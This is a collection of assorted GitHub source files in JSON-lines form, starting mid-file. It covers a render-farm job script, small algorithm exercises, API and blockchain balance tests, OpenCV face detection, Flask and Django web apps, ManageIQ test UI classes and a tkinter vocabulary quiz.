is no need to request more than 1. \n job['cpus'] = 1\n \n # Below defines the internal Qube! jobtype to be used to execute the job.\n # 'cmdline' tells Qube that on the backend, we will execute a single command line\n # command. This will be the same as opening a terminal/command prompt and typing\n # out a command.\n job['prototype'] = 'cmdline'\n job['env']={\n \"RMANTREE\":\"/opt/software/pixar/RenderManProServer-24.1/\",\n \"LD_LIBRARY_PATH\":\"/usr/lib:/usr/lib64:/opt/software/pixar/RenderManProServer-24.1/lib\",\n \"PATH\":\"/opt/software/pixar/RenderManProServer-24.1/bin:/opt/software/autodesk/maya/bin:/usr/bin\",\n \"MAYA_LOCATION\":\"/opt/software/autodesk/maya/\"}\n \n # The below parameters are explained further in the \"Job submission with job\n # package explained\" page\n package = {}\n package['cmdline'] = 'ls -al /opt/software/autodesk/arnold' #'Render TestMaya.ma'\n\n job['package'] = package\n \n # Below creates an empty list filled by the following lines of code.\n listOfJobsToSubmit = []\n \n # Below evaluates the jobs to be submitted and adds the to the above list\n listOfJobsToSubmit.append(job)\n \n # Below calls the list of jobs to be submitted and then prints the job IDs for each\n # While it is not strictly necessary that one submits a list of jobs, it is a good\n # habit to start, so we will only submit lists of jobs. It is, however, perfectly\n # acceptable to qb.submit(job)\n listOfSubmittedJobs = qb.submit(listOfJobsToSubmit)\n for job in listOfSubmittedJobs:\n print(job['id'])\n# Below runs the \"main\" function\nif __name__ == \"__main__\":\n main()\n sys.exit(0)\n","repo_name":"NCCA/RenderFarmTests","sub_path":"ScratchCode/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16352829387","text":"'''\nGiven a list of integers, write a function that will return a list, in which for each index the element will be the product of all the integers except for the element at that index\n\nFor example, an input of [1,2,3,4] would return [24,12,8,6] by performing [2×3×4,1×3×4,1×2×4,1×2×3]\n'''\n\ndef index_prod(lst):\n\n # Create an empty output list\n output = [None] * len(lst)\n\n # Set initial product and index for greedy run forward\n product = 1\n i = 0\n\n while i < len(lst):\n\n # Set index as cumulative product\n output[i] = product\n\n # Cumulative product\n product *= lst[i]\n\n i +=1\n\n print(\"output\", output)\n\n\n # Now for our Greedy run Backwards\n product = 1\n\n # Start index at last (taking into account index 0)\n i = len(lst) - 1\n\n print(\"----\")\n\n # Until the beginning of the list\n while i >=0:\n\n\n # Same operations as before, just backwards\n output[i] *= product\n product *= lst[i]\n i -= 1\n print(\"output\", output)\n\n return output\n\n\n\nindex_prod([1,2,3,4])\n","repo_name":"harishpuvvada/Algorithms-using-Python","sub_path":"Lists/product of ints.py","file_name":"product of ints.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"20604428306","text":"# -*- coding: windows-1251 -*-\nimport pytest\nimport ya_api\n\n\n@pytest.mark.parametrize(\n \"folder_name, ref\",\n ((\"test_folder\", 201), (\"test_folder\", 409))\n)\ndef test_create_folder(folder_name, ref):\n res = ya_api.create_yandex_folder(folder_name)\n assert res.status_code == ref","repo_name":"Satanas-Gigas/tests","sub_path":"tests/test_ya_api.py","file_name":"test_ya_api.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14472438759","text":"import logging\nimport time\n\nfrom batch_rpc_provider import BatchRpcProvider, BatchRpcException\n\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef test_get_balance():\n token_address = \"0x2036807B0B3aaf5b1858EE822D0e111fDdac7018\"\n call_data_params = []\n\n mumbai_holders = []\n logger.info(\"Load holders data...\")\n with open(\"mumbai_holders.txt\") as r:\n for line in r:\n if line.strip():\n mumbai_holders.append(line.strip())\n\n logger.info(f\"Loaded {len(mumbai_holders)} mumbai GLM holders...\")\n\n p = BatchRpcProvider('https://mumbai-temp.golem.network/api/rpc/polygon/MAaCpE421MddDmzMLcAp', 5)\n logger.info(f\"Start multi call for {len(mumbai_holders)} holder addresses\")\n start = time.time()\n resp = p.get_erc20_balances(mumbai_holders, token_address)\n end = time.time()\n\n glm_total_amount = 0\n for mumbai_holder_wallet, res in zip(mumbai_holders, resp):\n glm_amount = int(res, 0) / 1000000000 / 1000000000\n glm_total_amount += glm_amount\n logger.debug(f\"Holder {mumbai_holder_wallet}: {glm_amount}\")\n\n logger.info(f\"Total GLM amount found: {glm_total_amount}\")\n\n logger.info(f\"Response took {end - start:0.3f}s\")\n\n\nif __name__ == \"__main__\":\n for i in range(0,10000):\n test_get_balance()\n\n\n","repo_name":"scx1332/multi-rpc-call","sub_path":"test_erc20_balances.py","file_name":"test_erc20_balances.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9587162042","text":"#!/usr/bin/env python\nimport numpy as np\nimport cv2 as cv\nimport glob\nimport re\n\nface_cascade = cv.CascadeClassifier(cv.haarcascades + 'haarcascade_frontalface_default.xml')\n\ndef load_image(filename):\n return cv.imread(filename)\n\ndef detect_face(img):\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n h, w = img.shape[:2]\n size = (w, h)\n center = (w / 2, h / 2)\n\n imgs = []\n for angle in range(0, 180):\n for angle in [angle, -angle]:\n rotation_matrix = cv.getRotationMatrix2D(center, angle, 1.0)\n img_rot = cv.warpAffine(img, rotation_matrix, size, flags = cv.INTER_CUBIC)\n faces = face_cascade.detectMultiScale(img_rot, 1.3, 5)\n if len(faces) > 0:\n for (x, y, w, h) in faces:\n imgs.append(img[y : y + h, x : x + w])\n return imgs\n return imgs\n\ndef show(img, faces):\n for (x, y, w, h) in faces:\n cv.rectangle(img, (x, y), (x + w), (y + h), (255, 0, 0), 2)\n cv.imshow('img',img)\n cv.waitKey(300)\n\ndef save(img, filename):\n cv.imwrite(filename, img)\n\ndef detect_face_in_directory(directory):\n files = glob.glob(directory + '/**/*.jpg')\n print(\"files in\", directory, len(files))\n\n img = load_image('train/japan/6525274.jpg')\n faces = detect_face(img)\n for filename in files:\n img = load_image(filename)\n faces = detect_face(img)\n\n for idx, face in enumerate(faces):\n save_filename = re.sub(r'\\.jpg', '-%d.jpg' % idx, filename.replace(directory, 'face_' + directory))\n cv.imwrite(save_filename, face)\n\nfor directory in ['train', 'test']:\n detect_face_in_directory(directory)\n","repo_name":"masarakki/genzouman","sub_path":"detect-face.py","file_name":"detect-face.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42530879236","text":"from flask import Flask, render_template, redirect, session, flash\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom sqlalchemy.exc import IntegrityError\n\n# from werkzeug.exceptions import Unauthorized\n\nfrom models import connect_db, db, User, Feedback\nfrom forms import RegisterForm, LoginForm, FeedbackForm\n\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgres:///flask_feedback_db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SECRET_KEY'] = \"shhhhh\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\n\ntoolbar = DebugToolbarExtension(app)\n\nconnect_db(app)\n\n\n@app.route(\"/\")\ndef redirect_to_homepage():\n \"\"\"Homepage of site; redirect to register.\"\"\"\n\n return redirect(\"/homepage\")\n\n\n@app.route(\"/homepage\")\ndef homepage():\n \"\"\"Homepage of site; redirect to register.\"\"\"\n all_feedback = Feedback.query.all()\n return render_template(\"homepage.html\", feedback=all_feedback)\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register_form():\n form = RegisterForm()\n\n if form.validate_on_submit():\n username = form.username.data\n password = form.password.data\n email = form.email.data\n first_name = form.first_name.data\n last_name = form.last_name.data\n\n new_user = User.register(\n username, password, email, first_name, last_name)\n db.session.add(new_user)\n try:\n db.session.commit()\n except IntegrityError:\n form.username.errors.append('Username or email already in use')\n return render_template('register.html', form=form)\n session['curr_user'] = new_user.username\n flash(f'Welcome to the secret page {username}')\n return redirect(f'/users/{new_user.username}')\n return render_template('register.html', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login_form():\n form = LoginForm()\n\n if form.validate_on_submit():\n username = form.username.data\n password = form.password.data\n\n user = User.authenticate(username, password)\n if user:\n flash(f'Welcome Back, {user.username}')\n session['curr_user'] = user.username\n return redirect(f'/users/{user.username}')\n else:\n form.username.errors = ['Invalid username/password']\n\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\ndef logout():\n session.pop('curr_user')\n flash(\"You've logged out\")\n return redirect('/')\n\n\n@app.route('/users/')\ndef user_page(username):\n if 'curr_user' not in session:\n flash('Please Login first')\n return redirect('/')\n\n user = User.query.get_or_404(username)\n feedback = Feedback.query.filter_by(username=username)\n return render_template('user_info.html', user=user, feedback=feedback)\n\n\n@app.route('/users//delete', methods=['POST'])\ndef delete_user(username):\n \"\"\"Delete a user if signed in as said user\"\"\"\n\n if \"curr_user\" not in session or session['curr_user'] != username:\n flash('You don\\'t have permission to do that')\n return redirect('/')\n\n flash(f'User {username} has been deleted')\n Feedback.query.filter_by(username=username).delete()\n User.query.filter_by(username=username).delete()\n db.session.commit()\n session.pop('curr_user')\n return redirect('/')\n\n\n@app.route('/users//feedback/add', methods=['GET', 'POST'])\ndef feedback_form(username):\n \"\"\"Show form or add new feedback\"\"\"\n if \"curr_user\" not in session or session['curr_user'] != username:\n flash('You don\\'t have permission to do that')\n return redirect('/')\n\n form = FeedbackForm()\n\n if form.validate_on_submit():\n title = form.title.data\n content = form.content.data\n new_feedback = Feedback(\n title=title, content=content, username=username)\n db.session.add(new_feedback)\n db.session.commit()\n return redirect(f'/users/{username}')\n\n return render_template('feedback_form.html', form=form, username=username)\n\n\n@app.route('/feedback//update', methods=['GET', 'POST'])\ndef feedback_update_form(feedback_id):\n \"\"\"Show form or add new feedback\"\"\"\n feedback = Feedback.query.get_or_404(feedback_id)\n if \"curr_user\" not in session or session['curr_user'] != feedback.username:\n flash('You don\\'t have permission to do that')\n return redirect('/')\n\n form = FeedbackForm(obj=feedback)\n\n if form.validate_on_submit():\n feedback.title = form.title.data\n feedback.content = form.content.data\n db.session.add(feedback)\n db.session.commit()\n return redirect(f'/users/{feedback.username}')\n\n return render_template('feedback_edit.html', form=form, feedback=feedback)\n\n\n@app.route('/feedback//delete', methods=['POST'])\ndef delete_feedback(feedback_id):\n \"\"\"Show form or add new feedback\"\"\"\n feedback = Feedback.query.get_or_404(feedback_id)\n if \"curr_user\" not in session or session['curr_user'] != feedback.username:\n flash('You don\\'t have permission to do that')\n return redirect('/')\n\n db.session.delete(feedback)\n db.session.commit()\n\n return redirect(f'/users/{feedback.username}')\n","repo_name":"tdj182/Flask-Feedback","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18092118898","text":"import attr\nfrom navmazing import NavigateToAttribute\nfrom navmazing import NavigateToSibling\nfrom widgetastic.widget import Table\nfrom widgetastic.widget import Text\nfrom widgetastic.widget import TextInput\nfrom widgetastic_patternfly import Button\nfrom widgetastic_patternfly import Input\n\nfrom cfme.control.explorer import ControlExplorerView\nfrom cfme.modeling.base import BaseCollection\nfrom cfme.modeling.base import BaseEntity\nfrom cfme.utils.appliance.implementations.ui import CFMENavigateStep\nfrom cfme.utils.appliance.implementations.ui import navigate_to\nfrom cfme.utils.appliance.implementations.ui import navigator\nfrom cfme.utils.pretty import Pretty\nfrom cfme.utils.update import Updateable\nfrom widgetastic_manageiq import MultiBoxSelect\n\n\nclass PolicyProfileFormCommon(ControlExplorerView):\n title = Text(\"#explorer_title_text\")\n\n description = Input(name=\"description\")\n notes = TextInput(name=\"notes\")\n policies = MultiBoxSelect()\n cancel_button = Button(\"Cancel\")\n\n\nclass NewPolicyProfileView(PolicyProfileFormCommon):\n add_button = Button(\"Add\")\n\n @property\n def is_displayed(self):\n return (\n self.in_control_explorer and\n self.title.text == \"Adding a new Policy Profile\" and\n self.policy_profiles.tree.currently_selected == [\"All Policy Profiles\"]\n )\n\n\nclass EditPolicyProfileView(PolicyProfileFormCommon):\n save_button = Button(\"Save\")\n\n @property\n def is_displayed(self):\n return (\n self.in_control_explorer and\n self.title.text == 'Editing Policy Profile \"{}\"'.format(\n self.context[\"object\"].description) and\n self.policy_profiles.tree.currently_selected == [\n \"All Policy Profiles\",\n self.context[\"object\"].description\n ]\n )\n\n\nclass PolicyProfileDetailsView(ControlExplorerView):\n title = Text(\"#explorer_title_text\")\n\n @property\n def is_displayed(self):\n return (\n self.in_control_explorer and\n self.title.text == 'Policy Profile \"{}\"'.format(self.context[\"object\"].description)\n )\n\n\nclass PolicyProfilesAllView(ControlExplorerView):\n title = Text(\"#explorer_title_text\")\n entities = Table(\".//div[@id='main_div']/table\")\n\n @property\n def is_displayed(self):\n\n return (\n self.in_control_explorer and\n # BZ(1516302)\n 'All Policy Profile' in self.title.text\n )\n\n\n@attr.s\nclass PolicyProfile(BaseEntity, Updateable, Pretty):\n\n description = attr.ib()\n policies = attr.ib()\n notes = attr.ib(default=None)\n\n def update(self, updates):\n \"\"\"Update this Policy Profile in UI.\n\n Args:\n updates: Provided by update() context manager.\n cancel: Whether to cancel the update (default False).\n \"\"\"\n view = navigate_to(self, \"Edit\")\n changed = view.fill(updates)\n if changed:\n view.save_button.click()\n else:\n view.cancel_button.click()\n view = self.create_view(PolicyProfileDetailsView, override=updates, wait='10s')\n view.flash.assert_no_error()\n if changed:\n view.flash.assert_message(\n 'Policy Profile \"{}\" was saved'.format(\n updates.get(\"description\", self.description)))\n else:\n view.flash.assert_message(\n f'Edit of Policy Profile \"{self.description}\" was cancelled by the user')\n\n def delete(self, cancel=False):\n \"\"\"Delete this Policy Profile in UI.\n\n Args:\n cancel: Whether to cancel the deletion (default False).\n \"\"\"\n view = navigate_to(self, \"Details\")\n view.configuration.item_select(\"Remove this Policy Profile\", handle_alert=not cancel)\n if cancel:\n assert view.is_displayed\n view.flash.assert_no_error()\n else:\n view = self.create_view(PolicyProfilesAllView)\n assert view.is_displayed\n view.flash.assert_success_message(\n f'Policy Profile \"{self.description}\": Delete successful')\n\n @property\n def exists(self):\n \"\"\"Check existence of this Policy Profile.\n\n Returns: :py:class:`bool` signalizing the presence of the Policy Profile in database.\n \"\"\"\n miq_sets = self.appliance.db.client[\"miq_sets\"]\n return self.appliance.db.client.session\\\n .query(miq_sets.description)\\\n .filter(\n miq_sets.description == self.description and miq_sets.set_type == \"MiqPolicySet\")\\\n .count() > 0\n\n\n@attr.s\nclass PolicyProfileCollection(BaseCollection):\n\n ENTITY = PolicyProfile\n\n def create(self, description, policies, notes=None):\n policy_profile = self.instantiate(description, policies, notes=notes)\n view = navigate_to(self, \"Add\")\n view.fill({\n \"description\": policy_profile.description,\n \"notes\": policy_profile.notes,\n \"policies\": [policy.name_for_policy_profile for policy in policy_profile.policies]\n })\n view.add_button.click()\n view = policy_profile.create_view(PolicyProfileDetailsView)\n assert view.is_displayed\n view.flash.assert_success_message('Policy Profile \"{}\" was added'.format(\n policy_profile.description))\n return policy_profile\n\n @property\n def all_policy_profile_names(self):\n view = navigate_to(self, \"All\")\n return [row[1].text for row in view.entities]\n\n\n@navigator.register(PolicyProfileCollection, \"All\")\nclass PolicyProfileAll(CFMENavigateStep):\n VIEW = PolicyProfilesAllView\n prerequisite = NavigateToAttribute(\"appliance.server\", \"ControlExplorer\")\n\n def step(self, *args, **kwargs):\n self.prerequisite_view.policy_profiles.tree.click_path(\"All Policy Profiles\")\n\n\n@navigator.register(PolicyProfileCollection, \"Add\")\nclass PolicyProfileNew(CFMENavigateStep):\n VIEW = NewPolicyProfileView\n prerequisite = NavigateToSibling(\"All\")\n\n def step(self, *args, **kwargs):\n self.prerequisite_view.configuration.item_select(\"Add a New Policy Profile\")\n\n\n@navigator.register(PolicyProfile, \"Edit\")\nclass PolicyProfileEdit(CFMENavigateStep):\n VIEW = EditPolicyProfileView\n prerequisite = NavigateToSibling(\"Details\")\n\n def step(self, *args, **kwargs):\n self.prerequisite_view.configuration.item_select(\"Edit this Policy Profile\")\n\n\n@navigator.register(PolicyProfile, \"Details\")\nclass PolicyProfileDetails(CFMENavigateStep):\n VIEW = PolicyProfileDetailsView\n prerequisite = NavigateToAttribute(\"parent\", \"All\")\n\n def step(self, *args, **kwargs):\n self.prerequisite_view.policy_profiles.tree.click_path(\n \"All Policy Profiles\",\n self.obj.description\n )\n","repo_name":"ManageIQ/integration_tests","sub_path":"cfme/control/explorer/policy_profiles.py","file_name":"policy_profiles.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"77"} +{"seq_id":"8173663875","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup, Extension\n\n_cdblib_module = Extension('_cdblib', sources=['_cdblib.c'])\n\nsetup(author='David Wilson',\n author_email='dw@botanicus.net',\n description=\"Pure Python reader/writer for Dan J. Berstein's CDB format.\",\n download_url='https://github.com/dw/python-pure-cdb',\n keywords='cdb file format appengine database db',\n license='MIT',\n name='pure-cdb',\n py_modules=['cdblib'],\n ext_modules=[_cdblib_module],\n version='1.0'\n)\n","repo_name":"douglasbagnall/python-pure-cdb","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"8191498515","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n dict_obj = {}\n\n for i, num in enumerate(nums):\n remainder = target - num\n if remainder in dict_obj:\n return [dict_obj[remainder], i]\n\n dict_obj[num] = i","repo_name":"DishantK1807/Leetcode-Practice","sub_path":"01 - Two Sum/PythonSolution_2.py","file_name":"PythonSolution_2.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39141820819","text":"import numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nimport faiss\n\n\ndef loadWPCA(reduced_dim):\n \"\"\"\n Apply Dimension Reduction (PCA+Whitening)\n \"\"\"\n wpca = torch.load('pca'+str(reduced_dim)+'.pth')\n from UnifiedModel.Backbone import L2Norm\n l2 = L2Norm()\n return torch.nn.Sequential(wpca, l2)\n\n\ndef test(rv, opt, epoch=0, write_tboard=False):\n # wpca = loadWPCA(5120).to(rv.device)\n\n # TODO what if features dont fit in memory?\n test_data_loader = DataLoader(dataset=rv.whole_test_set, num_workers=opt.threads,\n batch_size=opt.cacheBatchSize, shuffle=False,\n pin_memory=True)\n\n rv.model.eval()\n with torch.no_grad():\n print('====> Extracting Features')\n pool_size = rv.encoder_dim\n if opt.pooling.lower() == 'netvlad':\n pool_size *= opt.num_clusters\n print(pool_size)\n # pool_size = 5120\n dbFeat = np.empty((len(rv.whole_test_set), pool_size))\n\n for iteration, (input, indices) in enumerate(test_data_loader, 1):\n input = input.to(rv.device)\n image_encoding = rv.model.encoder(input)\n del input\n if opt.withAttention:\n image_encoding = rv.model.attention(image_encoding)\n vlad_encoding = rv.model.pool(image_encoding)\n del image_encoding\n else:\n vlad_encoding = rv.model.pool(image_encoding)\n del image_encoding\n\n # vlad_encoding = wpca(vlad_encoding.unsqueeze(-1).unsqueeze(-1)).squeeze(-1).squeeze(-1)\n dbFeat[indices.detach().numpy(), :] = vlad_encoding.detach().cpu().numpy()\n if iteration % 50 == 0 or len(test_data_loader) <= 10:\n print(\"==> Batch ({}/{})\".format(iteration, len(test_data_loader)), flush=True)\n\n del vlad_encoding\n # torch.cuda.empty_cache()\n\n del test_data_loader\n torch.cuda.empty_cache()\n\n # extracted for both db and query, now split in own sets\n qFeat = dbFeat[rv.whole_test_set.dbStruct.numDb:].astype('float32')\n dbFeat = dbFeat[:rv.whole_test_set.dbStruct.numDb].astype('float32')\n\n print('====> Building faiss index')\n # res = faiss.StandardGpuResources() # use a single GPU\n # build a flat (CPU) index\n index_flat = faiss.IndexFlatL2(pool_size)\n # make it into a gpu index\n # gpu_index_flat = faiss.index_cpu_to_gpu(res, 0, index_flat)\n # add vectors to the index\n index_flat.add(dbFeat)\n\n # faiss_index = faiss.IndexFlatL2(pool_size)\n # faiss_index.add(dbFeat)\n\n print('====> Calculating recall @ N')\n n_values = [1, 5, 10, 20]\n if opt.dataset.lower() == 'tokyo247':\n n_values = [10, 50, 100, 200]\n\n import time\n since=time.time()\n _, predictions = index_flat.search(qFeat, max(n_values))\n time_elapsed=time.time()-since\n print('serching time per query (ms)', 1000*time_elapsed/rv.whole_test_set.dbStruct.numQ)\n\n predictionNew = []\n if opt.dataset.lower() == 'tokyo247':\n for idx, pred in enumerate(predictions):\n keep = [True for pidx in pred if rv.whole_test_set.dbStruct.dbTimeStamp[pidx] != rv.whole_test_set.dbStruct.qTimeStamp[idx]]\n # or (not (eval_set.dbStruct.utmDb[pidx] == eval_set.dbStruct.utmQ[idx]).all())]\n pred_keep = [pred[idxiii] for idxiii, iii in enumerate(keep) if iii is True]\n predictionNew.append(pred_keep[:max(n_values) // 10])\n predictions = predictionNew\n n_values = [1, 5, 10, 20]\n # elif opt.dataset.lower() == 'pittsburgh':\n # for idx, pred in enumerate(predictions):\n # keep = [True for pidx in pred if not (eval_set.dbStruct.utmDb[pidx] == eval_set.dbStruct.utmQ[idx]).all()]\n # pred_keep = [pred[idxiii] for idxiii, iii in enumerate(keep) if iii is True]\n # predictionNew.append(pred_keep[:max(n_values)//10])\n # predictions = predictionNew\n # n_values = [1, 5, 10, 20]\n\n # for each query get those within threshold distance\n gt = rv.whole_test_set.get_positives()\n\n correct_at_n = np.zeros(len(n_values))\n gtValid = 0\n # TODO can we do this on the matrix in one go?\n for qIx, pred in enumerate(predictions):\n # print(pred)\n # print(gt[qIx])\n if gt[qIx].size:\n gtValid += 1\n for i, n in enumerate(n_values):\n # if in top N then also in top NN, where NN > N\n if np.any(np.in1d(pred[:n], gt[qIx])):\n correct_at_n[i:] += 1\n break\n recall_at_n = correct_at_n / gtValid # eval_set.dbStruct.numQ\n\n recalls = {} # make dict for output\n for i, n in enumerate(n_values):\n recalls[n] = recall_at_n[i]\n print(\"====> Recall@{}: {:.4f}\".format(n, recall_at_n[i]))\n #if write_tboard: writer.add_scalar('Val/Recall@' + str(n), recall_at_n[i], epoch)\n\n return recalls\n","repo_name":"chengricky/ScenePlaceRecognition","sub_path":"TestScript.py","file_name":"TestScript.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"3166376873","text":"from tkinter import messagebox, ttk\nfrom tkinter import *\nimport random, os\nimport sqlite3\n\nclass Match:\n db_name = 'dictionary.db'\n\n def __init__(self, window):\n\n self.wind = window\n self.wind.title(\"Customers' data\")\n self.eng, self.trans = str(), str()\n self.message = Label(text = '', fg = 'red')\n self.message.grid(row = 1, column = 0, columnspan = 2, sticky = W + E)\n self.left = Listbox(height = 12, exportselection=False, activestyle='none')\n self.left.grid(row = 2, column = 0)\n self.right = Listbox(height = 12, activestyle='none')\n self.right.grid(row = 2, column = 1)\n self.right.bind(\"<>\", self.callback_right)\n self.left.bind(\"<>\", self.callback_left)\n ttk.Button(text=\"Return\", command=self.restart_program).grid(row = 4, column = 1, sticky = W + E)\n ttk.Button(text=\"Edit\", command=self.run_edit).grid(row = 4, column = 0, sticky = W + E)\n self.wind.protocol(\"WM_DELETE_WINDOW\", self.on_exit)\n self.get_names()\n def on_exit(self):\n if messagebox.askyesno(\"Exit\", \"Close?\"):\n self.wind.destroy()\n def run_query(self, query, parameters = ()):\n with sqlite3.connect(self.db_name) as conn:\n cursor = conn.cursor()\n result = cursor.execute(query, parameters)\n conn.commit()\n return result\n \n def get_names(self):\n query = 'SELECT * FROM dictionary ORDER BY name DESC'\n db_rows = self.run_query(query)\n lst_left, lst_right = [], []\n for row in db_rows:\n lst_left.append(row[1])\n lst_right.append(row[2])\n random.shuffle(lst_left)\n random.shuffle(lst_right)\n dic = dict(zip(lst_left, lst_right))\n for k, v in dic.items():\n self.left.insert(END, k)\n self.right.insert(END, v)\n def callback_left(self, event):\n self.message['text'] = ''\n if not event.widget.curselection():\n return\n w = event.widget\n idx = int(w.curselection()[0])\n self.eng = w.get(idx)\n with sqlite3.connect(self.db_name) as conn:\n cursor = conn.cursor()\n sqlite_select_query = 'SELECT * from dictionary WHERE name = ?'\n cursor.execute(sqlite_select_query, (self.eng,))\n record = cursor.fetchone()\n self.trans = record[2]\n \n def callback_right(self, event1):\n self.message['text'] = ''\n if not event1.widget.curselection():\n return\n \n w = event1.widget\n idx = int(w.curselection()[0])\n click = w.get(idx)\n if click == self.trans:\n self.right.delete(ANCHOR)\n self.left.delete(ANCHOR)\n else:\n self.message['text'] = 'Неправильно'\n self.right.selection_clear(0, END)\n def run_edit(self):\n os.system('edit_data.py')\n def restart_program(self):\n self.message['text'] = ''\n self.left.delete(0, END)\n self.right.delete(0, END)\n self.get_names()\n\nif __name__ == '__main__':\n window = Tk()\n window.geometry('250x245+350+200')\n application = Match(window)\n window.mainloop()\n","repo_name":"urnotrme/Internship-Project","sub_path":"data_list.py","file_name":"data_list.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17727319865","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('music', '0003_auto_20150320_1520'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Item1',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('item_id', models.CharField(max_length=30)),\n ('item_name', models.CharField(max_length=50)),\n ('art_name', models.CharField(max_length=30)),\n ('item_link', models.URLField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='user',\n name='age',\n field=models.IntegerField(default=0),\n preserve_default=True,\n ),\n ]\n","repo_name":"pipilove/WebSite","sub_path":"musicapp/music/migrations/0004_auto_20150320_1542.py","file_name":"0004_auto_20150320_1542.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9395510300","text":"from datetime import date\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.gis.geos import GEOSGeometry\nfrom django.contrib.gis.measure import D\nfrom django.contrib.gis.db.models.functions import Distance\nfrom django.db import IntegrityError\nfrom django.db.models import Prefetch, Q\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import View, ListView, DetailView\n\nfrom accounts.forms import UserProfileForm\nfrom accounts.models import UserProfile\nfrom cart.models import Cart\nfrom menu.models import Category, FoodItem\nfrom menu.utils import get_restaurant\nfrom orders.models import Order\nfrom .forms import RestaurantForm, OpeningHourForm, UserInfoForm, CheckoutForm\nfrom .models import Restaurant, OpeningHour\n\n\ndef get_or_set_current_location(request):\n if \"lat\" in request.session:\n lat = request.session[\"lat\"]\n lng = request.session[\"lng\"]\n return lat, lng\n elif \"lat\" in request.GET:\n lat = request.GET.get(\"lat\")\n lng = request.GET.get(\"lng\")\n request.session[\"lat\"] = lat\n request.session[\"lng\"] = lng\n return lat, lng\n else:\n return None\n\n\nclass HomePageView(ListView):\n model = Restaurant\n template_name = \"core/index.html\"\n context_object_name = \"restaurant_list\"\n\n def get_queryset(self):\n if get_or_set_current_location(self.request) is not None:\n latitude, longitude = get_or_set_current_location(self.request)\n pnt = GEOSGeometry(f\"POINT({longitude} {latitude})\", srid=4326)\n restaurant_list = (\n Restaurant.objects.filter(\n user_profile__location__distance_lte=(pnt, D(km=1000)),\n is_approved=True,\n user__is_active=True,\n )\n .annotate(distance=Distance(\"user_profile__location\", pnt))\n .order_by(\"distance\")\n )[:8]\n\n for restaurant in restaurant_list:\n restaurant.kms = round(restaurant.distance.km, 1)\n else:\n restaurant_list = Restaurant.objects.filter(\n is_approved=True, user__is_active=True\n )[:8]\n return restaurant_list\n\n\nclass RestaurantListView(ListView):\n model = Restaurant\n template_name = \"core/restaurant_list.html\"\n context_object_name = \"restaurant_list\"\n\n def get_queryset(self):\n restaurant_list = Restaurant.objects.filter(\n is_approved=True, user__is_active=True\n )[:8]\n return restaurant_list\n\n\nclass RestaurantProfileView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n user_profile = UserProfile.objects.get(user=request.user)\n restaurant = Restaurant.objects.get(user_profile=user_profile)\n\n context = {\n \"user_profile\": user_profile,\n \"restaurant\": restaurant,\n \"form\": UserProfileForm(instance=user_profile),\n \"r_form\": RestaurantForm(instance=restaurant),\n }\n\n return render(request, \"core/restaurant_profile.html\", context)\n\n def post(self, request, *args, **kwargs):\n user_profile = UserProfile.objects.get(user=request.user)\n restaurant = Restaurant.objects.get(user_profile=user_profile)\n form = UserProfileForm(request.POST, request.FILES, instance=user_profile)\n r_form = RestaurantForm(request.POST, request.FILES, instance=restaurant)\n if form.is_valid() and r_form.is_valid():\n form.save()\n r_form.save()\n messages.success(request, \"Your profile was updated successfully!\")\n return redirect(\"core:restaurant_profile\")\n else:\n messages.error(request, \"There was a problem updating\")\n context = {\n \"form\": form,\n \"r_form\": r_form,\n \"user_profile\": 